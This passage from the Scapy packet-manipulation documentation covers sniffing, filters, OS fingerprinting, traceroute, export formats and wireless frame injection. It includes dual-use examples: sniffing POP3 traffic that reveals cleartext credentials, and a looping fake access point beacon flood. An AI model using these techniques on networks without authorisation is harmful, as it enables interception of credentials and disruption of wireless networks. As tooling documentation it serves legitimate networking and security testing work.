>>> a[1]\n <Ether dst=00:ae:f3:52:aa:d1 src=00:02:15:37:a2:44 type=0x800 |<IP version=4L\n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=ICMP chksum=0x3831\n src=192.168.5.21 dst=66.35.250.151 options='' |<ICMP type=echo-request code=0\n chksum=0x6571 id=0x8745 seq=0x0 |<Raw load='B\\xf7g\\xda\\x00\\x07um\\x08\\t\\n\\x0b\n \\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\n \\x1e\\x1f !\\x22#$%&\\'()*+,-./01234567' |>>>>\n >>> sniff(iface=\"wifi0\", prn=lambda x: x.summary())\n 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133\n 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates\n 802.11 Management 5 00:0a:41:ee:a5:50 / 802.11 Probe Response / Info SSID / Info Rates / Info DSset / Info 133\n 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates\n 802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / Info SSID / Info Rates\n 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133\n 802.11 Management 11 00:07:50:d6:44:3f / 802.11 Authentication\n 802.11 Management 11 00:0a:41:ee:a5:50 / 802.11 Authentication\n 802.11 Management 0 00:07:50:d6:44:3f / 802.11 Association Request / Info SSID / Info Rates / Info 133 / Info 149\n 802.11 Management 1 00:0a:41:ee:a5:50 / 802.11 Association Response / Info Rates / Info 133 / Info 149\n 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133\n 802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSID / Info Rates / Info DSset / Info TIM / Info 133\n 802.11 / LLC / SNAP / ARP who has 172.20.70.172 says 172.20.70.171 / Padding\n 802.11 / LLC / SNAP / ARP is at 00:0a:b7:4b:9c:dd says 172.20.70.172 / Padding\n 802.11 / LLC / SNAP / IP / ICMP echo-request 0 / Raw\n 802.11 / LLC / SNAP / IP / ICMP echo-reply 0 / Raw\n >>> sniff(iface=\"eth1\", prn=lambda x: x.show())\n ---[ Ethernet ]---\n dst = 00:ae:f3:52:aa:d1\n src = 00:02:15:37:a2:44\n type = 0x800\n ---[ IP ]---\n version = 4L\n ihl = 5L\n tos = 0x0\n len = 84\n id = 0\n flags = DF\n frag = 0L\n ttl = 64\n proto = ICMP\n chksum = 0x3831\n src = 192.168.5.21\n dst = 66.35.250.151\n options = ''\n ---[ ICMP ]---\n type = echo-request\n code = 0\n chksum = 0x89d9\n id = 0xc245\n seq = 0x0\n ---[ Raw ]---\n load = 'B\\xf7i\\xa9\\x00\\x04\\x149\\x08\\t\\n\\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f !\\x22#$%&\\'()*+,-./01234567'\n ---[ Ethernet ]---\n dst = 00:02:15:37:a2:44\n src = 00:ae:f3:52:aa:d1\n type = 0x800\n ---[ IP ]---\n version = 4L\n ihl = 5L\n tos = 0x0\n len = 84\n id = 2070\n flags = \n frag = 0L\n ttl = 42\n proto = ICMP\n chksum = 0x861b\n src = 66.35.250.151\n dst = 192.168.5.21\n options = ''\n ---[ ICMP ]---\n type = echo-reply\n code = 0\n chksum = 0x91d9\n id = 0xc245\n seq = 0x0\n ---[ Raw ]---\n load = 'B\\xf7i\\xa9\\x00\\x04\\x149\\x08\\t\\n\\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f !\\x22#$%&\\'()*+,-./01234567'\n ---[ Padding ]---\n load = '\\n_\\x00\\x0b'\n >>> sniff(iface=[\"eth1\",\"eth2\"], prn=lambda x: x.sniffed_on+\": \"+x.summary())\n eth3: Ether / IP / ICMP 192.168.5.21 > 66.35.250.151 echo-request 0 / Raw \n eth3: Ether / IP / ICMP 66.35.250.151 > 192.168.5.21 echo-reply 0 / Raw \n eth2: Ether / IP / ICMP 192.168.5.22 > 66.35.250.152 echo-request 0 / Raw \n eth2: Ether / IP / ICMP 66.35.250.152 > 192.168.5.22 echo-reply 0 / Raw\n\nFor even more control over displayed information we can use the ``sprintf()`` function::\n\n >>> pkts = sniff(prn=lambda x:x.sprintf(\"{IP:%IP.src% -> %IP.dst%\\n}{Raw:%Raw.load%\\n}\"))\n 192.168.1.100 -> 64.233.167.99\n \n 64.233.167.99 -> 192.168.1.100\n \n 192.168.1.100 -> 64.233.167.99\n \n 192.168.1.100 -> 64.233.167.99\n 'GET / HTTP/1.1\\r\\nHost: 64.233.167.99\\r\\nUser-Agent: Mozilla/5.0 \n (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy)\n Firefox/2.0.0.8\\r\\nAccept: text/xml,application/xml,application/xhtml+xml,\n text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\r\\nAccept-Language:\n en-us,en;q=0.5\\r\\nAccept-Encoding: gzip,deflate\\r\\nAccept-Charset:\n ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\nKeep-Alive: 300\\r\\nConnection:\n keep-alive\\r\\nCache-Control: max-age=0\\r\\n\\r\\n'\n \nWe can sniff and do passive OS fingerprinting::\n\n >>> p\n <Ether dst=00:10:4b:b3:7d:4e src=00:40:33:96:7b:60 type=0x800 |<IP version=4L\n ihl=5L tos=0x0 len=60 id=61681 flags=DF frag=0L ttl=64 proto=TCP chksum=0xb85e\n src=192.168.8.10 dst=192.168.8.1 options='' |<TCP sport=46511 dport=80\n seq=2023566040L ack=0L dataofs=10L reserved=0L flags=SEC window=5840\n chksum=0x570c urgptr=0 options=[('Timestamp', (342940201L, 0L)), ('MSS', 1460),\n ('NOP', ()), ('SAckOK', ''), ('WScale', 0)] |>>>\n >>> load_module(\"p0f\")\n >>> p0f(p)\n (1.0, ['Linux 2.4.2 - 2.4.14 (1)'])\n >>> a=sniff(prn=prnp0f)\n (1.0, ['Linux 2.4.2 - 2.4.14 (1)'])\n (1.0, ['Linux 2.4.2 - 2.4.14 (1)'])\n (0.875, ['Linux 2.4.2 - 2.4.14 (1)', 'Linux 2.4.10 (1)', 'Windows 98 (?)'])\n (1.0, ['Windows 2000 (9)'])\n\nThe number before the OS guess is the accuracy of the guess.\n\nFilters\n-------\n\n.. index::\n single: filter, sprintf()\n\nDemo of both bpf filter and sprintf() method::\n\n >>> a=sniff(filter=\"tcp and ( port 25 or port 110 )\",\n prn=lambda x: x.sprintf(\"%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport% %2s,TCP.flags% : %TCP.payload%\"))\n 192.168.8.10:47226 -> 213.228.0.14:110 S : \n 213.228.0.14:110 -> 192.168.8.10:47226 SA : \n 192.168.8.10:47226 -> 213.228.0.14:110 A : \n 213.228.0.14:110 -> 192.168.8.10:47226 PA : +OK <13103.1048117923@pop2-1.free.fr>\n \n 192.168.8.10:47226 -> 213.228.0.14:110 A : \n 192.168.8.10:47226 -> 213.228.0.14:110 PA : USER toto\n \n 213.228.0.14:110 -> 192.168.8.10:47226 A : \n 213.228.0.14:110 -> 192.168.8.10:47226 PA : +OK \n \n 192.168.8.10:47226 -> 213.228.0.14:110 A : \n 192.168.8.10:47226 -> 213.228.0.14:110 PA : PASS tata\n \n 213.228.0.14:110 -> 192.168.8.10:47226 PA : -ERR authorization failed\n \n 192.168.8.10:47226 -> 213.228.0.14:110 A : \n 213.228.0.14:110 -> 192.168.8.10:47226 FA : \n 192.168.8.10:47226 -> 213.228.0.14:110 FA : \n 213.228.0.14:110 -> 192.168.8.10:47226 A : \n\nSend and receive in a loop \n--------------------------\n\n.. index::\n single: srloop()\n\nHere is an example of a (h)ping-like functionality : you always send the same set of packets to see if something change::\n\n >>> srloop(IP(dst=\"www.target.com/30\")/TCP())\n RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding\n fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S\n RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding\n fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S\n RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding\n fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S\n RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding\n fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S\n IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S\n\n\nImporting and Exporting Data\n----------------------------\nPCAP\n^^^^\n\nIt is often useful to save capture packets to pcap file for use at later time or with different applications::\n\n >>> wrpcap(\"temp.cap\",pkts)\n\nTo restore previously saved pcap file:\n\n >>> pkts = rdpcap(\"temp.cap\")\n\nor\n\n >>> pkts = sniff(offline=\"temp.cap\")\n\nHexdump\n^^^^^^^\n\nScapy allows you to export recorded packets in various hex formats.\n\nUse ``hexdump()`` to display one or more packets using classic hexdump format::\n\n >>> hexdump(pkt)\n 0000 00 50 56 FC CE 50 00 0C 29 2B 53 19 08 00 45 00 .PV..P..)+S...E.\n 0010 00 54 00 00 40 00 40 01 5A 7C C0 A8 19 82 04 02 .T..@.@.Z|......\n 0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5 ......Za....pI..\n 0030 08 00 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 ................\n 0040 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 .......... !\"#$%\n 0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &'()*+,-./012345\n 0060 36 37 67\n\nHexdump above can be reimported back into Scapy using ``import_hexcap()``::\n\n >>> pkt_hex = Ether(import_hexcap())\n 0000 00 50 56 FC CE 50 00 0C 29 2B 53 19 08 00 45 00 .PV..P..)+S...E.\n 0010 00 54 00 00 40 00 40 01 5A 7C C0 A8 19 82 04 02 .T..@.@.Z|......\n 0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5 ......Za....pI..\n 0030 08 00 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 ................\n 0040 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 .......... !\"#$%\n 0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &'()*+,-./012345\n 0060 36 37 67\n >>> pkt_hex\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\n \\x1f !\"#$%&\\'()*+,-./01234567' |>>>>\n\nBinary string\n^^^^^^^^^^^^^\n\nYou can also convert entire packet into a binary string using the ``raw()`` function::\n\n >>> pkts = sniff(count = 1)\n >>> pkt = pkts[0]\n >>> pkt\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\n \\x1f !\"#$%&\\'()*+,-./01234567' |>>>>\n >>> pkt_raw = raw(pkt)\n >>> pkt_raw\n '\\x00PV\\xfc\\xceP\\x00\\x0c)+S\\x19\\x08\\x00E\\x00\\x00T\\x00\\x00@\\x00@\\x01Z|\\xc0\\xa8\n \\x19\\x82\\x04\\x02\\x02\\x01\\x08\\x00\\x9c\\x90Za\\x00\\x01\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\n \\x08\\t\\n\\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\n \\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./01234567'\n\nWe can reimport the produced binary string by selecting the appropriate first layer (e.g. ``Ether()``).\n\n >>> new_pkt = Ether(pkt_raw)\n >>> new_pkt\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\n \\x1f !\"#$%&\\'()*+,-./01234567' |>>>>\n\nBase64\n^^^^^^\n\nUsing the ``export_object()`` function, Scapy can export a base64 encoded Python data structure representing a packet::\n\n >>> pkt\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f \n !\"#$%&\\'()*+,-./01234567' |>>>>\n >>> export_object(pkt)\n eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST\n OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao\n bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT\n WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6\n ...\n\nThe output above can be reimported back into Scapy using ``import_object()``::\n\n >>> new_pkt = import_object()\n eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST\n OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao\n bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT\n WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6\n ...\n >>> new_pkt\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f \n !\"#$%&\\'()*+,-./01234567' |>>>>\n\nSessions\n^^^^^^^^\n\nAt last Scapy is capable of saving all session variables using the ``save_session()`` function:\n\n>>> dir()\n['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_raw', 'pkts']\n>>> save_session(\"session.scapy\")\n\nNext time you start Scapy you can load the previous saved session using the ``load_session()`` command::\n\n >>> dir()\n ['__builtins__', 'conf']\n >>> load_session(\"session.scapy\")\n >>> dir()\n ['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_raw', 'pkts']\n\n\nMaking tables\n-------------\n\n.. index::\n single: tables, make_table()\n\nNow we have a demonstration of the ``make_table()`` presentation function. It takes a list as parameter, and a function who returns a 3-uple. The first element is the value on the x axis from an element of the list, the second is about the y value and the third is the value that we want to see at coordinates (x,y). The result is a table. This function has 2 variants, ``make_lined_table()`` and ``make_tex_table()`` to copy/paste into your LaTeX pentest report. Those functions are available as methods of a result object :\n\nHere we can see a multi-parallel traceroute (scapy already has a multi TCP traceroute function. See later)::\n\n >>> ans, unans = sr(IP(dst=\"www.test.fr/30\", ttl=(1,6))/TCP())\n Received 49 packets, got 24 answers, remaining 0 packets\n >>> ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) )\n 216.15.189.192 216.15.189.193 216.15.189.194 216.15.189.195 \n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 \n 2 81.57.239.254 81.57.239.254 81.57.239.254 81.57.239.254 \n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 \n 4 213.228.3.3 213.228.3.3 213.228.3.3 213.228.3.3 \n 5 193.251.254.1 193.251.251.69 193.251.254.1 193.251.251.69 \n 6 193.251.241.174 193.251.241.178 193.251.241.174 193.251.241.178 \n\nHere is a more complex example to identify machines from their IPID field. We can see that 172.20.80.200:22 is answered by the same IP stack than 172.20.80.201 and that 172.20.80.197:25 is not answered by the sape IP stack than other ports on the same IP.\n\n::\n\n >>> ans, unans = sr(IP(dst=\"172.20.80.192/28\")/TCP(dport=[20,21,22,25,53,80]))\n Received 142 packets, got 25 answers, remaining 71 packets\n >>> ans.make_table(lambda (s,r): (s.dst, s.dport, r.sprintf(\"%IP.id%\")))\n 172.20.80.196 172.20.80.197 172.20.80.198 172.20.80.200 172.20.80.201 \n 20 0 4203 7021 - 11562 \n 21 0 4204 7022 - 11563 \n 22 0 4205 7023 11561 11564 \n 25 0 0 7024 - 11565 \n 53 0 4207 7025 - 11566 \n 80 0 4028 7026 - 11567 \n\nIt can help identify network topologies very easily when playing with TTL, displaying received TTL, etc.\n\nRouting\n-------\n\n.. index::\n single: Routing, conf.route\n\nNow scapy has its own routing table, so that you can have your packets routed differently than the system::\n\n >>> conf.route\n Network Netmask Gateway Iface\n 127.0.0.0 255.0.0.0 0.0.0.0 lo\n 192.168.8.0 255.255.255.0 0.0.0.0 eth0\n 0.0.0.0 0.0.0.0 192.168.8.1 eth0\n >>> conf.route.delt(net=\"0.0.0.0/0\",gw=\"192.168.8.1\")\n >>> conf.route.add(net=\"0.0.0.0/0\",gw=\"192.168.8.254\")\n >>> conf.route.add(host=\"192.168.1.1\",gw=\"192.168.8.1\")\n >>> conf.route\n Network Netmask Gateway Iface\n 127.0.0.0 255.0.0.0 0.0.0.0 lo\n 192.168.8.0 255.255.255.0 0.0.0.0 eth0\n 0.0.0.0 0.0.0.0 192.168.8.254 eth0\n 192.168.1.1 255.255.255.255 192.168.8.1 eth0\n >>> conf.route.resync()\n >>> conf.route\n Network Netmask Gateway Iface\n 127.0.0.0 255.0.0.0 0.0.0.0 lo\n 192.168.8.0 255.255.255.0 0.0.0.0 eth0\n 0.0.0.0 0.0.0.0 192.168.8.1 eth0\n\nGnuplot\n-------\n\n.. index::\n single: Gnuplot, plot()\n\nWe can easily plot some harvested values using Gnuplot. (Make sure that you have Gnuplot-py and Gnuplot installed.)\nFor example, we can observe the IP ID patterns to know how many distinct IP stacks are used behind a load balancer::\n\n >>> a, b = sr(IP(dst=\"www.target.com\")/TCP(sport=[RandShort()]*1000))\n >>> a.plot(lambda x:x[1].id)\n <Gnuplot._Gnuplot.Gnuplot instance at 0xb7d6a74c>\n\n.. image:: graphics/ipid.png\n\n\nTCP traceroute (2)\n------------------\n\n.. index::\n single: traceroute(), Traceroute\n\nScapy also has a powerful TCP traceroute function. Unlike other traceroute programs that wait for each node to reply before going to the next, scapy sends all the packets at the same time. This has the disadvantage that it can't know when to stop (thus the maxttl parameter) but the great advantage that it took less than 3 seconds to get this multi-target traceroute result::\n\n >>> traceroute([\"www.yahoo.com\",\"www.altavista.com\",\"www.wisenut.com\",\"www.copernic.com\"],maxttl=20)\n Received 80 packets, got 80 answers, remaining 0 packets\n 193.45.10.88:80 216.109.118.79:80 64.241.242.243:80 66.94.229.254:80 \n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 \n 2 82.243.5.254 82.243.5.254 82.243.5.254 82.243.5.254 \n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 \n 4 212.27.50.46 212.27.50.46 212.27.50.46 212.27.50.46 \n 5 212.27.50.37 212.27.50.41 212.27.50.37 212.27.50.41 \n 6 212.27.50.34 212.27.50.34 213.228.3.234 193.251.251.69 \n 7 213.248.71.141 217.118.239.149 208.184.231.214 193.251.241.178 \n 8 213.248.65.81 217.118.224.44 64.125.31.129 193.251.242.98 \n 9 213.248.70.14 213.206.129.85 64.125.31.186 193.251.243.89 \n 10 193.45.10.88 SA 213.206.128.160 64.125.29.122 193.251.254.126 \n 11 193.45.10.88 SA 206.24.169.41 64.125.28.70 216.115.97.178 \n 12 193.45.10.88 SA 206.24.226.99 64.125.28.209 66.218.64.146 \n 13 193.45.10.88 SA 206.24.227.106 64.125.29.45 66.218.82.230 \n 14 193.45.10.88 SA 216.109.74.30 64.125.31.214 66.94.229.254 SA \n 15 193.45.10.88 SA 216.109.120.149 64.124.229.109 66.94.229.254 SA \n 16 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n 17 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n 18 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n 19 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n 20 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n (<Traceroute: UDP:0 TCP:28 ICMP:52 Other:0>, <Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>)\n\nThe last line is in fact the result of the function : a traceroute result object and a packet list of unanswered packets. The traceroute result is a more specialised version (a subclass, in fact) of a classic result object. We can save it to consult the traceroute result again a bit later, or to deeply inspect one of the answers, for example to check padding.\n\n >>> result, unans = _\n >>> result.show()\n 193.45.10.88:80 216.109.118.79:80 64.241.242.243:80 66.94.229.254:80 \n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 \n 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 \n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 \n [...]\n >>> result.filter(lambda x: Padding in x[1])\n\nLike any result object, traceroute objects can be added :\n\n >>> r2, unans = traceroute([\"www.voila.com\"],maxttl=20)\n Received 19 packets, got 19 answers, remaining 1 packets\n 195.101.94.25:80 \n 1 192.168.8.1 \n 2 82.251.4.254 \n 3 213.228.4.254 \n 4 212.27.50.169 \n 5 212.27.50.162 \n 6 193.252.161.97 \n 7 193.252.103.86 \n 8 193.252.103.77 \n 9 193.252.101.1 \n 10 193.252.227.245 \n 12 195.101.94.25 SA \n 13 195.101.94.25 SA \n 14 195.101.94.25 SA \n 15 195.101.94.25 SA \n 16 195.101.94.25 SA \n 17 195.101.94.25 SA \n 18 195.101.94.25 SA \n 19 195.101.94.25 SA \n 20 195.101.94.25 SA \n >>>\n >>> r3=result+r2\n >>> r3.show()\n 195.101.94.25:80 212.23.37.13:80 216.109.118.72:80 64.241.242.243:80 66.94.229.254:80 \n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 \n 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 \n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 \n 4 212.27.50.169 212.27.50.169 212.27.50.46 - 212.27.50.46 \n 5 212.27.50.162 212.27.50.162 212.27.50.37 212.27.50.41 212.27.50.37 \n 6 193.252.161.97 194.68.129.168 212.27.50.34 213.228.3.234 193.251.251.69 \n 7 193.252.103.86 212.23.42.33 217.118.239.185 208.184.231.214 193.251.241.178 \n 8 193.252.103.77 212.23.42.6 217.118.224.44 64.125.31.129 193.251.242.98 \n 9 193.252.101.1 212.23.37.13 SA 213.206.129.85 64.125.31.186 193.251.243.89 \n 10 193.252.227.245 212.23.37.13 SA 213.206.128.160 64.125.29.122 193.251.254.126 \n 11 - 212.23.37.13 SA 206.24.169.41 64.125.28.70 216.115.97.178 \n 12 195.101.94.25 SA 212.23.37.13 SA 206.24.226.100 64.125.28.209 216.115.101.46 \n 13 195.101.94.25 SA 212.23.37.13 SA 206.24.238.166 64.125.29.45 66.218.82.234 \n 14 195.101.94.25 SA 212.23.37.13 SA 216.109.74.30 64.125.31.214 66.94.229.254 SA \n 15 195.101.94.25 SA 212.23.37.13 SA 216.109.120.151 64.124.229.109 66.94.229.254 SA \n 16 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n 17 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n 18 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n 19 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n 20 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n\nTraceroute result object also have a very neat feature: they can make a directed graph from all the routes they got, and cluster them by AS. You will need graphviz. By default, ImageMagick is used to display the graph.\n\n >>> res, unans = traceroute([\"www.microsoft.com\",\"www.cisco.com\",\"www.yahoo.com\",\"www.wanadoo.fr\",\"www.pacsec.com\"],dport=[80,443],maxttl=20,retry=-2)\n Received 190 packets, got 190 answers, remaining 10 packets\n 193.252.122.103:443 193.252.122.103:80 198.133.219.25:443 198.133.219.25:80 207.46...\n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 192.16...\n 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 82.251...\n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 213.22...\n [...]\n >>> res.graph() # piped to ImageMagick's display program. Image below.\n >>> res.graph(type=\"ps\",target=\"| lp\") # piped to postscript printer\n >>> res.graph(target=\"> /tmp/graph.svg\") # saved to file \n\n.. image:: graphics/graph_traceroute.png\n\nIf you have VPython installed, you also can have a 3D representation of the traceroute. With the right button, you can rotate the scene, with the middle button, you can zoom, with the left button, you can move the scene. If you click on a ball, it's IP will appear/disappear. If you Ctrl-click on a ball, ports 21, 22, 23, 25, 80 and 443 will be scanned and the result displayed::\n\n >>> res.trace3D()\n\n.. image:: graphics/trace3d_1.png\n\n.. image:: graphics/trace3d_2.png\n\nWireless frame injection\n------------------------\n\n.. index::\n single: FakeAP, Dot11, wireless, WLAN\n\nProvided that your wireless card and driver are correctly configured for frame injection\n\n::\n\n $ iw dev wlan0 interface add mon0 type monitor\n $ ifconfig mon0 up\n\nOn Windows, if using Npcap, the equivalent would be to call\n\n # Of course, conf.iface can be replaced by any interfaces accessed through IFACES\n >>> conf.iface.setmonitor(True)\n\nyou can have a kind of FakeAP::\n\n >>> sendp(RadioTap()/\n Dot11(addr1=\"ff:ff:ff:ff:ff:ff\",\n addr2=\"00:01:02:03:04:05\",\n addr3=\"00:01:02:03:04:05\")/\n Dot11Beacon(cap=\"ESS\", timestamp=1)/\n Dot11Elt(ID=\"SSID\", info=RandString(RandNum(1,50)))/\n Dot11Elt(ID=\"Rates\", info='\\x82\\x84\\x0b\\x16')/\n Dot11Elt(ID=\"DSset\", info=\"\\x03\")/\n Dot11Elt(ID=\"TIM\", info=\"\\x00\\x01\\x00\\x00\"),\n iface=\"mon0\", loop=1)\n\nDepending on the driver, the commands needed to get a working frame injection interface may vary. You may also have to replace the 